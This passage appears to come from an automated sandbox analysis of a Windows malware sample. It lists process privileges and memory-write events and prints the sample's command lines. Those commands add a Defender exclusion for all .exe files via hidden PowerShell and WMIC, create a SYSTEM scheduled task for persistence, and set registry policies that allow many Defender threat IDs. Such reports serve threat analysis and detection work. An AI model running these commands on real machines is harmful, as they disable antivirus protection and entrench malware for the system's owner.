Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3644 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe
PID 3644 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe
PID 3644 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe
PID 3160 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3160 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3160 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1088 wrote to memory of 4060 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1088 wrote to memory of 4060 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1088 wrote to memory of 4060 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4060 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4060 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4060 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5036 wrote to memory of 2628 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 5036 wrote to memory of 2628 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 5036 wrote to memory of 2628 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3160 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3160 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3160 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1204 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1204 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1204 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1396 wrote to memory of 4872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1396 wrote to memory of 4872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1396 wrote to memory of 4872 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4872 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4872 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4872 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 1328 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 1328 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 1328 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3788 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 3228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4800 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4800 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4800 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 1048 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 1048 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 1048 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 2492 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 2492 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 2492 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4224 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1396 wrote to memory of 4668 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe

"C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe

.\Install.exe /AdidysikD "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bpJjqbWMDOjxkYrvBb" /SC once /ST 05:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe\" Oz /qmsite_idPOM 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe Oz /qmsite_idPOM 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

